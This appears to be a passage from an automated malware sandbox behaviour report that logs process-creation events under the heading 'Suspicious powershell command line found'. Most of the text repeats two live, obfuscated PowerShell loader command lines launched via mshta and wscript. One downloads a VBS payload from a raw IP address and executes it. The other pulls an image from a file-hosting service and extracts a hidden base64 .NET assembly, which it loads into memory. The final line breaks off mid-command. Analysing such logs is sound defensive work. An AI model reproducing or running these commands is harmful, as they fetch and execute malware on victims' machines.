Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MD